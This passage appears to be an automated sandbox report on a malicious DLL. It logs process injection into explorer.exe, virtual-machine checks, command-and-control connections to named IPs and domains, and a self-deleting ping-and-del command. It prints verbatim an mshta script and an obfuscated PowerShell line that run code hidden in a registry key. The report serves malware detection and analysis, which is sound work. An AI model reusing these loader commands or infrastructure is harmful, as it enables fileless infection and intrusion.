Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6000 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogaysol0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bplkxjdz.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9685 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000017.00000000.682082141.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000017.00000000.682491990.0000000007B66000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000017.00000000.669787220.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 0000001C.00000002.877330831.0000020727667000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000017.00000000.669787220.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp|
Source: explorer.exe, 00000017.00000000.675091139.0000000005F25000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.41.44.51 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.207.46.124 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: internetcoca.in
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: meganetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.105.103.207 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 62.173.149.9 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: supernetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7B4F912E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7B4F912E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 286000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFE468F1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 23F0000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 65130DC000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFE468F1580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 28C000 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFE468F1580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 23E0000 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFE468F1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFE468F1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute read Jump to behavior
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 23E0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3320 base: 286000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3320 base: 7FFE468F1580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3320 base: 23F0000 value: 80 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3320 base: 28C000 value: 00 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3320 base: 7FFE468F1580 value: EB Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3320 base: 23E0000 value: 80 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3320 base: 7FFE468F1580 value: 40 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 5160 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3320 Jump to behavior
Source: C:\Windows\System32\control.exe Thread register set: target process: 3320 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 468F1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 468F1580 Jump to behavior
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 468F1580 Jump to behavior
Source: unknown Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>qnma='wscript.shell';resizeto(0,2);eval(new activexobject(qnma).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([system.text.encoding]::ascii.getstring((cyynsofy "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([system.text.encoding]::ascii.getstring((cyynsofy "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn)) Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP" Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
Source: explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.686983756.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000017.00000000.669708180.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.675019770.00000000056F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000017.00000000.668777721.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.686983756.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
